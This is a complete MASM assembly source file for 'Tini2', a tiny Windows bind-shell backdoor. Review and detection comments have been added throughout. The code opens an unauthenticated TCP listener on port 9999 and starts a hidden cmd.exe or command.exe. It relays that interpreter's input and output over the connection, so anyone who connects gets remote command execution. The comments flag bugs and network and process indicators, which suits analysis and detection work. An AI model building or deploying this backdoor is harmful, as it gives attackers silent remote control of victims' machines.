

; Modified from the file Tini2.cpp.
; Tini2.cpp was made by dangcefire and refdom.
;
; Usage: telnet IP 9999
; Tini2 modified by dengkeng, written in Win32Asm, only 1.51K.
; EMail: shellc0de@sohu.com
; If you modify the .asm, please send me a copy :)
 
    .486                       ; create 32 bit code 
    .model flat, stdcall       ; 32 bit memory model 
    option casemap :none       ; case sensitive 
 
    include \masm32\include\windows.inc 
    include \masm32\include\masm32.inc 
    include \masm32\include\gdi32.inc 
    include \masm32\include\user32.inc 
    include \masm32\include\kernel32.inc 
    include \masm32\include\Comctl32.inc 
    include \masm32\include\comdlg32.inc 
    include \masm32\include\shell32.inc 
    include \masm32\include\oleaut32.inc 
    include \masm32\include\wsock32.inc 
 
    includelib \masm32\lib\masm32.lib 
    includelib \masm32\lib\gdi32.lib 
    includelib \masm32\lib\user32.lib 
    includelib \masm32\lib\kernel32.lib 
    includelib \masm32\lib\Comctl32.lib 
    includelib \masm32\lib\comdlg32.lib 
    includelib \masm32\lib\shell32.lib 
    includelib \masm32\lib\oleaut32.lib 
    includelib \masm32\lib\wsock32.lib 
 
; Values GetCMDPath stores in OsType. OsType is written but never read
; in this file.
win2k	equ	1 
win9x	equ	0 
; TCP port the listener in `start` binds to on INADDR_ANY. A listener on
; this port owned by an unexpected process is the most direct network
; indicator this file provides.
TCP_PORT	equ	9999 
 
    .const 
; MessageBox texts used on the WSAStartup / socket / bind failure paths.
szErrorTitle	db	'Error',0 
szErrorMsg	db	'Init Error',0 
szErrorSockMsg	db	'Init Sock Error!',0 
szErrorBindMsg	db	'Init Bind Error!',0 
; szSucc is referenced only by commented-out MessageBox calls in
; GetCMDPath; szSuccTitle is not referenced anywhere in this file.
szSucc		db	'Succesfull!',0 
szSuccTitle	db	'Succ!',0 
; Interpreter file names appended to the system directory by GetCMDPath.
win2kCMD	db	'\cmd.exe',0 
win98CMD	db	'\command.exe',0 
 
 
    .data? 
stWsa		WSADATA		<?> 
; Local address the listening socket is bound to (despite the name).
RemoteAddr	sockaddr_in	<?> 
; Filled in `start` to launch the interpreter with redirected std handles.
startinfo	STARTUPINFO	<?> 
processinfo	PROCESS_INFORMATION	<?> 
 
;ThreadA 
; State for the socket -> interpreter-stdin direction.
pipeattrA	SECURITY_ATTRIBUTES <?> 
recv_buff	db	1024 dup(?) 
; nByteToWrite holds the raw return value of recv, including error values.
nByteToWrite	dd	? 
nByteWritten	dd	? 
 
;ThreadB 
; State for the interpreter-stdout/stderr -> socket direction.
pipeattrB	SECURITY_ATTRIBUTES <?> 
send_buff	db	25000 dup(?) 
len		dd	? 
 
 
; hInstance is stored in `start` and not used afterwards in this file.
hInstance	dd	? 
OsType		dd	? 
ServerSocket	dd	? 
; Single global client socket, overwritten by every accept in `start`
; and read by both worker threads without any synchronisation.
ClientSocket	dd	? 
; Ready flags: each worker thread sets its flag to 1 after CreatePipe;
; `start` polls both before launching the interpreter.
varA		dw	? 
varB		dw	? 
dwThreadIDA	DWORD	? 
dwThreadIDB	DWORD	? 
; Pipe 1 (ThreadFuncA): hReadPipe = read end, becomes the child's stdin;
;                       hWriteFile = write end, fed from recv.
; Pipe 2 (ThreadFuncB): hReadFile = read end, drained into send;
;                       hWritePipe = write end, becomes the child's
;                       stdout and stderr.
hReadPipe	HANDLE	? 
hWritePipe	HANDLE	? 
hWriteFile	HANDLE	? 
hReadFile	HANDLE	? 
; Full path of the interpreter, built by GetCMDPath (120-byte buffer).
szAPP		db	120	dup(?) 
 
    .code 
 
;-----------------------------------------------------------------------
; GetCMDPath
; Builds the path of the command interpreter in the global szAPP and
; records the platform in OsType.
; In:    nothing
; Out:   szAPP  = system directory + '\cmd.exe' or '\command.exe'
;        OsType = win2k or win9x
; Regs:  all general-purpose registers preserved (pushad / popad)
; NOTE(review): the results of GetSystemDirectory and GetVersionEx are
; not checked, so szAPP/osvi may hold stale or undefined data on failure.
;-----------------------------------------------------------------------
GetCMDPath	proc 
	local	SysPath[120]:byte 
	local	osvi:OSVERSIONINFO 
 
	pushad 
	invoke	GetSystemDirectory,addr SysPath,sizeof SysPath 
	; Copy at most sizeof SysPath (120) bytes, including the terminator,
	; into the 120-byte global szAPP.
	invoke	lstrcpyn,addr szAPP,addr SysPath,sizeof SysPath 
	;invoke	MessageBox, NULL,addr szAPP, addr szSucc, MB_OK 
 
	; dwOSVersionInfoSize must be set before the call.
	mov	osvi.dwOSVersionInfoSize,sizeof OSVERSIONINFO 
	invoke	GetVersionEx,addr osvi 
	mov	edx,osvi.dwPlatformId 
	; 2 is VER_PLATFORM_WIN32_NT; every other platform id takes the
	; Win9x branch.
	; NOTE(review): lstrcat is unbounded. szAPP can already hold up to
	; 119 characters, so appending 8 or 12 more can run past the end of
	; the 120-byte buffer when the system directory path is long.
	.if	edx==2 
		invoke	lstrcat,addr szAPP,addr win2kCMD 
		mov	dword ptr [OsType],win2k 
	.else 
		invoke	lstrcat,addr szAPP,addr win98CMD 
		mov	dword ptr [OsType],win9x 
	.endif 
	;invoke	MessageBox, NULL,addr szAPP, addr szSucc, MB_OK 
	popad 
	ret 
GetCMDPath	endp 
 
;-----------------------------------------------------------------------
; ThreadFuncA (thread entry, stdcall, one DWORD parameter, unused)
; Creates the pipe that becomes the interpreter's stdin, signals
; readiness through varA, then forwards every byte received on
; ClientSocket into that pipe, forever.
; Security note: received data is written to the interpreter's stdin
; unmodified; there is no authentication, filtering or encryption on
; this path.
; NOTE(review): the loop has no exit, so the trailing `ret` and the
; `uses eax` epilogue are never reached.
;-----------------------------------------------------------------------
ThreadFuncA	proc	uses eax ,lpParam:DWORD 
	 
	; Both pipe handles are created inheritable; the CreatePipe result
	; is not checked.
	mov	pipeattrA.nLength,sizeof SECURITY_ATTRIBUTES 
	mov	pipeattrA.lpSecurityDescriptor,NULL 
	mov	pipeattrA.bInheritHandle,TRUE 
	invoke	CreatePipe,addr hReadPipe,addr hWriteFile,addr pipeattrA,0 
 
	; Tell `start` that hReadPipe is ready (set even if CreatePipe failed).
	mov	word ptr [varA],1 
	 
	@@3: 
		invoke	Sleep,250 
		; ClientSocket is a global that `start` overwrites on each accept;
		; until the first accept completes it is whatever .data? holds.
		invoke	recv,ClientSocket,addr recv_buff,1024,0 
		; NOTE(review): eax is stored unchecked. When recv fails it returns
		; SOCKET_ERROR (-1), so WriteFile is asked to write 0FFFFFFFFh
		; bytes from a 1024-byte buffer; a return of 0 (peer closed) is
		; not handled either.
		mov	nByteToWrite,eax 
 
		invoke	WriteFile,hWriteFile,addr recv_buff,nByteToWrite,addr nByteWritten,NULL 
	jmp	@@3 
 
	ret 
ThreadFuncA	endp	 
 
 
;-----------------------------------------------------------------------
; ThreadFuncB (thread entry, stdcall, one DWORD parameter, unused)
; Creates the pipe that becomes the interpreter's stdout/stderr, signals
; readiness through varB, then forwards everything read from that pipe
; to ClientSocket, forever.
; Security note: interpreter output leaves the host in clear text on
; the client connection.
; NOTE(review): the loop has no exit, so the trailing `ret` and the
; `uses eax` epilogue are never reached.
;-----------------------------------------------------------------------
ThreadFuncB	proc	uses eax ,lpParam:DWORD 
	 
	; Both pipe handles are created inheritable; the CreatePipe result
	; is not checked.
	mov	pipeattrB.nLength,sizeof SECURITY_ATTRIBUTES 
	mov	pipeattrB.lpSecurityDescriptor,NULL 
	mov	pipeattrB.bInheritHandle,TRUE 
 
	invoke	CreatePipe,addr hReadFile,addr hWritePipe,addr pipeattrB,0 
 
	; Tell `start` that hWritePipe is ready (set even if CreatePipe failed).
	mov	word ptr [varB],1 
 
	@@2: 
		; Reads up to 25000 bytes of interpreter output into send_buff.
		; NOTE(review): neither the ReadFile nor the send result is
		; checked; after a failed read, `len` may hold a stale value.
		invoke	ReadFile,hReadFile,addr send_buff,25000,addr len,NULL 
		invoke	send,ClientSocket,addr send_buff,len,0 
	jmp	@@2 
 
	ret 
ThreadFuncB	endp 
 
 
;-----------------------------------------------------------------------
; start (program entry point)
; 1. Resolves the interpreter path (GetCMDPath).
; 2. Opens a TCP listener on INADDR_ANY:TCP_PORT.
; 3. Starts ThreadFuncA / ThreadFuncB and waits until both have created
;    their pipes.
; 4. Launches the interpreter hidden, with stdin/stdout/stderr
;    redirected to those pipes and handle inheritance enabled.
; 5. Accepts connections forever, storing each in ClientSocket.
;
; Security note: any host that can reach the port gets an interactive
; command interpreter running with this process's privileges; there is
; no authentication and no transport encryption anywhere in the file.
; Observable behaviour for detection, all taken from the code below: a
; TCP listener on port 9999 bound to all interfaces, and a child
; cmd.exe / command.exe started from the system directory with a hidden
; window and its standard handles redirected to anonymous pipes.
;-----------------------------------------------------------------------
start: 
	invoke	GetModuleHandle,NULL 
	mov	hInstance,eax 
	invoke	GetCMDPath 
	 
	; WSAStartup returns non-zero on failure.
	invoke	WSAStartup,0002h,addr stWsa 
	.if	eax 
		invoke	MessageBox,NULL,addr szErrorMsg,addr szErrorTitle,MB_OK 
		invoke	ExitProcess,NULL 
	.endif 
 
	invoke	socket,AF_INET,SOCK_STREAM,IPPROTO_TCP 
	.if	eax!=INVALID_SOCKET 
		mov	ServerSocket,eax 
	.else 
		invoke	MessageBox,NULL,addr szErrorSockMsg,addr szErrorTitle,MB_OK 
		invoke	ExitProcess,NULL 
	.endif 
 
	; Bind to every local interface (INADDR_ANY) on TCP_PORT.
	mov	RemoteAddr.sin_family,AF_INET 
	invoke	htons,TCP_PORT 
	mov	RemoteAddr.sin_port,ax 
	mov	RemoteAddr.sin_addr,INADDR_ANY 
 
	invoke	bind,ServerSocket,addr RemoteAddr,sizeof sockaddr_in 
 
	; NOTE(review): the result of listen is not checked.
	.if	eax==SOCKET_ERROR 
		invoke	MessageBox,NULL,addr szErrorBindMsg,addr szErrorTitle,MB_OK 
		invoke	ExitProcess,NULL 
	.else 
		invoke	listen,ServerSocket,5 
	.endif 
 
	; Clear both ready flags before the worker threads start.
	xor	edx,edx 
	mov	varA,dx 
	mov	varB,dx 
	 
	; The workers start before any client is accepted, so their first
	; recv/send calls use ClientSocket before it holds a connection.
	; The returned thread handles are not kept or closed.
	invoke	CreateThread,NULL,NULL,offset ThreadFuncA,NULL,0,addr dwThreadIDA 
	invoke	CreateThread,NULL,NULL,offset ThreadFuncB,NULL,NULL,addr dwThreadIDB 
@@1:	 
	; Poll every 250 ms until varA == 1 and varB == 1, i.e. both
	; threads are past their CreatePipe call. The flags are plain
	; words with no synchronisation primitive.
	invoke	Sleep,250 
	mov	dx,varA 
	cmp	dx,1 
	jnz	@@1 
	and	dx,varB 
	cmp	dx,1 
	jnz	@@1 
 
	; Start from this process's own startup info, then redirect the
	; child's standard handles: stdin <- hReadPipe, stdout and stderr
	; -> hWritePipe, with the window hidden (SW_HIDE).
	invoke	GetStartupInfo,addr startinfo 
	mov	startinfo.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES 
	mov	edx,hReadPipe 
	mov	startinfo.hStdInput,edx 
	mov	edx,hWritePipe 
	mov	startinfo.hStdError,edx 
	mov	startinfo.hStdOutput,edx 
	mov	startinfo.wShowWindow,SW_HIDE 
	; szAPP is passed as the application name with no command line;
	; bInheritHandles is TRUE. Both ends of each pipe were created
	; inheritable, so the child also receives the parent-side ends.
	; NOTE(review): the CreateProcess result is not checked and the
	; handles returned in processinfo are never closed.
	invoke	CreateProcess,addr szAPP,NULL, NULL, NULL, TRUE, 0,NULL, NULL, addr startinfo, addr processinfo 
	 
	@@11: 
		; Each accepted socket replaces ClientSocket, so only the most
		; recent connection is served; earlier sockets are never closed
		; and a failed accept (INVALID_SOCKET) is stored as well.
		invoke	accept,ServerSocket,NULL,NULL 
		mov	ClientSocket,eax 
		invoke	Sleep,250 
	jmp  @@11 
 
	; Not reached: the accept loop above has no exit.
	invoke	ExitProcess,NULL 
end start